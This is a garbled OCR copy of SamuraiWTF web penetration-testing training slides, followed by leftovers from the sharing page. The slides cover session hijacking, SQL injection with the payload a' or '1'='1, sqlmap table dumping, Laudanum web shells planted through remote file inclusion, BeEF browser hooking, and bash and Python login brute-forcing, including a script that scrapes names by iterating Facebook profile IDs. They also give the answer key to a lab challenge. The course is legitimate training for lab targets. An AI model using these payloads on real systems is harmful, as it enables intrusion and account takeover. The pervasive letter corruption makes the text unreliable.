Lxplolung LargeL user's browser vulnerablllues
LxplolLauon Lxamples
(#)*"$: v[no
+2)&: addons.mozllla.org/en-uS/refox/addon/cookles-
manager-plus/
;#$,"%&: Add and edlL sesslon and perslsLenL cookles,
plus all Lhelr properues
<&1)#$&%:
Cookle semngs Lake prlorlLy over lnLernal cookles
Cookle search lLers

Cookles Manager+
use Cookles Manager+ Lo log lnLo predlcLable sesslon
lus
use ZA Lo lnLercepL a requesL for one of your users
use ZA's Lncode/uecode/Pash Lool Lo generaLe a base64 of
anoLher user's ulu number
8eplace your user's ulu cookle wlLh Lhe new generaLed ulu
Sesslon Pl[acklng
Cn Lhe "Logln" page:
8e sure you are nC1 logged ln
1ry logglng ln wlLh user "admln" and a slngle quoLe
for Lhe password
Why dld you geL an error page?
Make a logln requesL for user "admln" and ln Lhe
password eld, force a boolean Lrue condluon such
as:
a' or '1'='1
Why dld Lhls log you ln?
8aslc SCL ln[ecuon LxplolLauon
(#)*"$: 8ernardo uamele A. C. (lnquls)
+2)&: hup://sqlmap.sourceforge.neL
;#$,"%&: An auLomaLed SCL ln[ecuon Lool LhaL boLh
deLecLs and explolLs SCL ln[ecuon aws on MySCL,
Cracle, osLgreSCL, and MS SCL Server
>1-3#13&: yLhon
<&1)#$&%: Check Lhe help (-h).
+6-)18:
sqlmap.py -u <LargeL> [opuons]
SCLMap
8evlew Lhe opuons for sqlmap (-h)
8un sqlmap on SCL aw Lo verlfy lL can see lL
(dlscovery)
use sqlmap Lo explolL Lhe SCL aw
Lnumerauon Commands
--ngerprlnL --dbs --Lables --columns --counL
lnnlng Commands
-u daLabase -1 Lable
uumplng Lables
--dump
CS lnLeracuon
SCLMap Lxerclse
(#)*"$%: kevln !ohnson & !usun Searle
+2)&: laudanum.secureldeas.neL
;#$,"%&: a collecuon of ln[ecLable les, deslgned Lo be
used ln a penLesL when SCL ln[ecuon aws are found
and are ln muluple languages for dlerenL
envlronmenLs
;*1%&%: explolLauon
>1-3#13&%: asp, aspx, cfm, [sp, php
A")1B9& <&1)#$&%:
SecurlLy: AuLhenucauon & l address resLrlcuons
ayloads: dns, le, header, proxy, shell
!15&1)%: MusL remember Lo pre-congure payloads
Laudanum
Congure a Laudanum P shell wlLh Lhe
approprlaLe username and l
Copy Lhe new le Lo your /var/www dlrecLory
use Lhe 8ll vulnerablllLy map Lo have Lhe do[o-
baslc appllcauon reLrleve and execuLe your code
you should have found and 8ll aw durlng your code
ln[ecuon Lesung
8ll Lxerclse
(#)*"$: Wade Alcorn and oLhers
+2)&: hup://beefpro[ecL.com
;#$,"%&: A P (or 8uby) web-based lnLerface for
command and conLrol of SS-ed zomble browsers
lncludlng several explolLs and modules
>1-3#13&: P or 8uby
+1?#$12 A")&%:
?ou can sLarL 8eLl from Lhe maln
menu or you can [usL run "beef"
from any command prompL. Powever,
make sure you use <C18L> <C> keys
Lo sLop before closlng Lhe Lermlnal wlndow. lf you forgeL,
you'll have Lo do a "klllall ruby" Lo sLop 8eLl
8eLl
SLarL beef from Lhe maln menu and leave LhaL new Lermlnal
wlndow open
Accesslng Lhe conLrol panel (user/pass ls beef/beef)
http://localhost:3000/ui/panel
Spawn a zomble example
http://localhost:3000/demos/basic.html
LxperlmenL wlLh Lhe dlerenL commands
lnserL Lhe followlng hook ln a Lhe perslsLenL SS aw:
<script src="http://localhost:3000/hook.js"></script>
use Lhe chromlum and konqueror browsers Lo vlslL Lhe
ln[ecL llnk and geL hooked lnLo 8eLl
8eLl Lxerclse
?ou1ube Channel & 8log
hups://www.youLube.com/user/1he8eefpro[ecL
hup://blog.beefpro[ecL.com
1unnellngroxy (localhosL:6789)
8ecome Lhe vlcum user on Lhe web-app
8urp SulLe & sqlmap &. (same domaln)
ss8ays
MeLasplolL lnLegrauon
Plgh CuallLy" 8eLl
Samurai Dojo Scavenger
A dojo (, dj) is a Japanese term which literally means "place of the way".
Initially, dj were adjunct to temples. The term can refer to a formal training
place for any of the Japanese do arts but typically it is considered the formal
gathering place for students of any Japanese martial arts style to conduct
training, examinations and other related encounters. -- Wikipedia
Student Challenge
?ou can nd Lhe challenge aL:
hup://do[o-scavenger
CollecL as many keys as you can
up Lo 20 keys could be found
(err. buL lL appears some are broken ", buL 18 are ndable)
keys look llke: 1dcca23333272036f04fe8bf20edfce0"
A key lu wlll be wlLh or near" Lhe acLual key
such as kL?001dcca23333272036f04fe8bf20edfce0"
keys can be found ln all sLeps of Lhe meLhodology, so don'L
focus only on explolLauon
8onus polnLs:
Pow were Lhe keys generaLed?
Can you you calculaLe whaL Lhe 21sL key would be?
SLudenL Challenge
The next page contains the Student Challenge answers.
Youve been warned.
STOP!!!

So I lied about the next page containing the answer.
Its really the NEXT page.

(Full Disclosure: I Needed a second stop page because printed versions of these slides
have two slides showing per page...)
STOP NOW!
I'm not joking this time!
key 00 cfcd208493d363ef66e7d9f98764da
allowed P11 meLhod ln C1lCnS meLhod response
key 01 a1d0c6e83f027327d8461063f4ac38a6
ln 18ACL le ln web rooL (/18ACL)
key 02 68d30a9394728bc39aa24be94b319d21
ln apache cong le for uo[o-Scavenger:
/eLc/apache2/slLes-avallable/do[o-scavenger
key 03 069039b7ef840f0c74a814ec9237b6ec
used as your sesslon varlable 10 of Lhe ume
key 04 006f32e9102a8d3be2fe3614f42ba989
hLml commenL on lndex.php
WalkLhrough: keys 0-4
key 03 6f3ef77ac0e3619e98139e9b6febf337
php commenL on lndex.php
key 06 03c6b06932c730899bb03d998e631860
CL1 parameLer ln /admln/lndex.php form submlL
key 07 6883966fd8f918a4aa29be29d2c386
defaulL LexL for commenL" eld on conLacLus.php
lL ls aL Lhe bouom of Lhe eld, so scroll down
key 08 6833436e2fe46a9d49d3d3af4f37443d
hldden eld on supporL.php
key 09 8bf1211fd4b7b94328899de0a43b93
new P11 meLhod obLalned uslng Lhe SAMLL meLhod
key 10 b6f0479ae87d244973439c6124392772
base64 encoded meLa Lag on lndex.php
key 11 31d92be1c60d1db1d2e3e7a07da33b26
ln a le called "key11" ln Lhe unllnked dlrecLory crack"
key 12 b337e84de8732b27eda3a12363109e80
unS enLry ln a zone Lransfer
key 13 ed263bc903a3a097f61d3ec064d96d2e
hldden ln daLabase, use a sql ln[ecuon explolL Lo nd
key 14 daca41214b39c3dc66674d09081940f0
8esponse Lo logglng lnLo parLner user accounL "key"
key 13 9cc138f8dc04cbf16240daa92d8d30e2
dlssallow enLry ln roboLs.LxL
key 16 2dea61eed4bceec364a00113c4d21334
Allowed domaln ln crossdomaln.xml
key 17 d14220ee66aeec73c49038383428ec4c
new P11 header response value ln all responses
key 18 2823f4797102ce1a1aec03339cc16dd9
defaulL dlrecLory ln web rooL
key 19 9e3cfc48eccf81a0d37663e129aef3cb
bruLe force password abc123" on /admln/lndex.php
We wlll all conunue Lo learn ...
A few Lhlngs wlll help us down LhaL paLh
Conunue explorlng Lhe Lools
8ulld a LesL lab
1each oLhers
!oln pro[ecLs
nexL SLeps
Web Services
1esung web servlces doesn'L change our
meLhodology
lnsLead of a user lnLerface + proxy, we use
WSuLs (Web Servlce uenluon Language)
uocumenLauon on Lhe web servlce
Sample packeL capLures
lnLercepuon proxles mlghL be used lf we can geL
Lhe web servlce agenL Lo go Lhrough Lhem
Lasy wlLh cllenL-slde code ob[ecLs ln web apps
Works wlLh Lradluonal agenLs lf you can seL proxles
or make Lhem work wlLh LransparenL proxles
Web Servlces vs Web Apps
AuLhor: SmarL8ear
SlLe: hup://www.soapul.org
urpose: an open source Lool LhaL allows you Lo easlly
and rapldly creaLe and execuLe auLomaLed funcuonal,
regresslon, compllance, and load LesLs for web servlces
Language: !ava
leaLures:
Cne of Lhe besL Lools for parslng WSuLs and creaung LesL
cases for each requesL
SupporLs boLh SCA and 8LS1 web servlces
Web Servlces
1. Co Lo *G,HIIF5J1 and check ouL Lhelr sLandalone web servlces
2. SLarL Soapul and creaLe pro[ecLs for all Lhree servlces
CurrenL SamuralW1l has a broken menu lLem for Soapul, sLarL Lhls way
usr/local/SmarL8ear/soapul-4.3.2/bln/soapul.sh
3. use Soapul's manual requesLer Lo explore how each servlce
works
4. Congure Soapul Lo use your lnLercepuon proxy and record
each requesL and response
3. use your lnLercepuon proxy Lools Lo LesL Lhe lnLerface as you
would any oLher P11 requesL
6. 1ry uslng some of Lhe Lools dlscussed earller ln
class Lo LesL and explolL Lhese web servlces
Mapplng and 1esung Web Servlces
Scripting With Bash
(#)*"$: Prvo[e nlkl &
Cluseppe Scrlvano
+2)&:
hups://www.gnu.org/
soware/wgeL/
;#$,"%&: Soware package
for reLrlevlng les uslng P11,
P11S and l1. lL ls a non-
lnLeracuve command llne
Lool, so lL may easlly be called
from scrlpLs.
>1-3#13&: C
+6-)18: <see nexL slldes>
(#)*"$: Paxx (1eam)
+2)&: hup://curl.haxx.se
;#$,"%&: curl ls a command
llne Lool for Lransferrlng daLa
wlLh u8L synLax, supporung
ulC1, llLL, l1, l1S,
CCPL8, P11, P11S, lMA,
lMAS, LuA, LuAS, C3,
C3S, 81M, 81S, SC,
Sl1, SM1, SM1S, 1LLnL1
and 1l1.
>1-3#13&: C
+6-)18: <see nexL slldes>
wgeL and curl
Comparlng wgeL & curl
8oLh wgeL and curl perform Lhe same baslc funcuons
rlmary advanLage of wgeL: baslc splderlng capablllues
rlmary advanLage of curl: cusLom P11 meLhods
8elow are some slde-by-slde examples, each llne
does Lhe same Lhlng ln each Lool
1ry each of Lhem Lo explore each Lool
wgeL -q -C- hup://dvwa
wgeL hup://dvwa/lndex.php
wgeL --user-agenL "CoogleboL" hup://dvwa
wgeL --posL-daLa "useradmln" hup://dvwa
wgeL --splder -e roboLso -r hup://dvwa
n/A
n/A
n/A
curl hup://dvwa
curl -C hup://dvwa/lndex.php
curl --user-agenL "qualys" hup://dvwa
curl -d "useradmln" hup://dvwa
n/A
curl -fC hup://localhosL/lcons/[a-z][a-z].glf
curl - C1lCnS -v hup://localhosL
curl - 18ACL -v hup://dvwa
1. use curl Lo pass Lhe approprlaLe P11 requesL
Lo log lnLo uo[o-8aslc as admln
2. LvaluaLe Lhe P11 response Lo verlfy logln was
successful
uslng Curl on uo[o-8aslc's Logln
1. lpe Lhe ouLpuL of your curl logln lnLo grep Lo
search for Lhe approprlaLe success or fallure
sLrlng
2. use curl's @% opuon Lo puL run "sllenL" mode and
remove Lhe requesL sLausucs from Lhe ouLpuL
3. use grep's @& opuon Lo speclc muluple search
sLrlngs for boLh success and fallure
4. use grep's @" opuon Lo show only Lhe
search sLrlng lf found
uslng Crep Lo nd keywords
1. lor loops allow us Lo lLeraLe Lhrough a llsL of lLems and
perform acuons wlLh each lLem

for i in {0..19}; do echo -n "Loop "; echo $i; done

2. 1ry wlLh Lhe command above, changlng elemenLs
unul you undersLand how lL works
3. 8eplace Lhe echo loops wlLh your
prevlous curl/grep logln command
uslng lor Loops ln 8ash
Keyword to start the for loop's code block
Creating a number sequence Keyword to end code block
1. now replace Lhe {0..19} wlLh Lhe cewl
wordllsL you creaLed earller `cat dojo-
basic.cewl` (uslng backucks) and replace
your password logln value Lo $i Lo fuzz Lhe
password
2. lf LhaL seems Lo work, modlfy your code block
Lo prlnL Lhe auempLed password on Lhe same
llne before your success/fallure message
luzzlng uo[o-8aslc's Logln
Scripting With Python
re-lnsLalled on Mac and Llnux
Lasy Lo lnsLall on Wlndows
Lasy Lo wrlLe scrlpLs LhaL run on all CSes
Lasy Lo read and collaboraLe
very compleLe seL of sLandard llbrarles
Many sLable and powerful 3rd parLy llbrarles
Why yLhon
uslng an lnLeracuve pyLhon shell
Lype pyLhon" on your command llne
Lype pyLhon commands
Lhey execuLe when you hlL enLer
Why use Lhe shell?
Lasy way Lo learn Lhe language
CreaL way Lo debug poruons of code
nlce for oC funcuons and loops
8eyond Lhe baslc shell
Conslder lpyLhon or luLL aer you geL your feeL weL
rovlde rlcher funcuonallLy and producuvlLy
yLhon Shell
prlnL('1hls slLe ls proLecLed by SSL.')

answer rawlnpuL('uo you wlsh Lo conunue? ')

lf answer.lower() 'no':
prlnL('Lxlung Lhe program.')
else:
prlnL('Conunulng rogram.')
lnpuL and CuLpuL
Basic output
Basic input
if / then / else
conditional
statements. Notice
the colons followed
by mandatory line
indentions
object oriented bliss
#$992BK
P11, P11S, & l1
AuLo arses u8l
lollows 8edlrecuons
uses a Cookle !ar
AuLh: 8aslc & ulgesL
MeLhods: CL1 & CS1
SupporLs roxy Servers
AuLo Closes Connecuons

*G,92B
P11 & P11S
no u8l arslng
uoesn'L lollow 8edlrecLs
uoesn'L SLore Cookles
AuLhenucauon: none
MeLhod: Any
no roxy SupporL
Manually Close Connecuon
A 1ale of 1wo Llbrarles

lmporL hupllb

connecuon hupllb.P11Connecuon("secureldeas.neL")
connecuon.requesL("18ACL", "/lndex.hLml")

response connecuon.geLresponse()
payload response.read()

prlnL(payload)
uslng hupllb
Create a connection object
Network request
made here
Extract payload
Extract reponse
Domain only

lmporL urlllb2

requesL urlllb2.8equesL('hup://www.uullsec.com')

response urlllb2.urlopen(requesL)

prlnL(payload)
uslng urlllb2
The library that does the magic
This doesnt make the
request, it simply
packages the request
Dont for get the http://
This sends the request,
catches the response,
and extracts out the
response payload
lmporL urlllb2, urlllb

url 'hup://whols.arln.neL/ul/query.do'
daLa 'ushCache' : 'false',
'querylnpuL' : '198.60.22.2'
daLa urlllb.urlencode(daLa)
requesL urlllb2.8equesL(url, daLa)


prlnL(payload)

CS1 8equesLs
If you provide urllib2
with request data, it will
assume a POST
Then urlencode your data
(dont forget to import urllib)
Add your POST
data to a dictionary
lmporL urlllb2

url 'hup://google.com/qsamural-wu'
headers 'user-AgenL' : 'Mozllla/3.0 (lhone)'
requesL urlllb2.8equesL(url, none, headers)

headers response.headers

prlnL(headers)
Worklng wlLh Peaders
Add your headers to
a dictionary
If you are doing a GET,
use the keyword
"None" for data field
lmporL urlllb2

requesL urlllb2.8equesL('hup://www.uullsec.com')


wlLh open('lndex.hLml', 'wb') as le:
le.wrlLe(payload)
Wrlung Lo a llle
Write the response payload to the file
(to read files, use file.read to read the
whole file or file.readline in a loop)
Try opening a file, in
write and binary
modes (use r for read)
lmporL urlllb2, re
requesL urlllb2.8equesL('hup://lnguardlans.com/lnfo')

regex r'<dL class"uLle">(.)</dL>'
resulLs re.ndall( regex , payload )

for resulL ln resulLs:
prlnL(resulL)
lllLerlng 8esponses
Build your regex
using a raw string,
grouping desired text
Search payload
for all instances
of your regex
Loop through your results printing them
lmporL urlllb2

url 'hup://browserspy.dk/password-ok.php'
username 'LesL'
password 'LesL'

passwordmgr urlllb2.P11asswordMgrWlLhuefaulL8ealm()
passwordmgr.addpassword(none, url, username, password)
auLhhandler urlllb2.P118aslcAuLhPandler(passwordmgr)
opener urlllb2.bulldopener(auLhhandler)
urlllb2.lnsLallopener(opener)

response urlllb2.urlopen(url)
prlnL( payload )
8aslc AuLhenucauon
Setup needed variables
Setup a password manager
Add passwords
Connect handler
Build and install so all
requests automatically use
the password manager
lmporL urlllb2, re

llsL (1333093938 + l for l ln range(0, 20) )

for lLem ln llsL:
url 'hup://m.facebook.com/people/a/' + sLr(lLem)
Lry:
response urlllb2.urlopen(url)
excepL lCLrror:
pass
else:
regex r'<sLrong>([<])'
maLch re.search(regex, payload)
lf maLch:
name maLch.groups()
slLe response.geLurl().spllL("?")[0]
prlnL("0 1 2".formaL(lLem, name[0], slLe) )
luzzlng and 8ruLe lorce
Create list of 20 Facebook IDs
Prevent missing pages from throwing
an error and stopping the script
Extract name from page
Grab url and remove redirect reference
Format output
use Lhe prevlous yLhon examples Lo wrlLe a
scrlpL Lo fuzz admln's password on Lhe uo[o-8aslc
logln page
luzzlng uo[o-8aslc's Logln
yLhon Commandllne lnLerface 1emplaLes
hup://code.google.com/p/pyclL
a collecuon of LemplaLes for creaung command llne Lools
greaL Lool for beglnners Lo show how Lo do Lhe baslcs
saves advanced users ume by provldlng baslc plus more
Lach LemplaLes wlll glve you:
8ullL ln command llne argumenLs, easlly modlable
rovldes a help page lf no argumenLs are glven
1racks and dlsplays your scrlpL verslon
verboslLy and debug funcuons wlLh command llne ags
Command llne opuons and funcuons for readlng and wrlung
Lo les
pyCl1
CompleLed 1emplaLes
8aslc le read/wrlLe access
Slngle-Lhreaded hup requesLs (baslc wgeL/curl funcuons)
1emplaLes ln rogress
Mulu-Lhreaded hup requesLs (baslc wgeL/curl funcuons)
lanned 1emplaLes
8lnary le read/wrlLe access wlLh hex decode (baslc xxd/
hexdump funcuons)
8aw sockeL cllenL and servlce (baslc neLcaL funcuons)
8aw usb devlce access
lnLeracuve CLl lnLerface
pyCl1 1emplaLes
upcomlng Samural-W1l courses:
Check upcomlng 8lackPaL, CWAS, nullcon, 8ruCCn,
8ooLedCCn, nCSC. securlLy conferences

8elaLed courses also LaughL by course auLhors:
SAnS 6-day Web enLesung Course (SLC342)
hups://www.sans.org/course/sec342
SAnS 6-day Advanced Web enLesung Course (SLC642)
hup://www.sans.org/course/sec642
upcomlng Classes
!usun Searle
Managlng arLner - uullSec
[usun[meeas.com // [usun[uullsec.com
+1 801 784 2032
[meeas
lnsLrucLor ConLacL lnformauon

SamuraiWTF Course v17 - Slides

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

SamuraiWTF Course v17 - Slides

Uploaded by

Copyright:

Available Formats

1 Copyright 2012, 2013 Justin Searle www.utilisec.

The most under utilized steps

... AND the developer's perspective

You might also like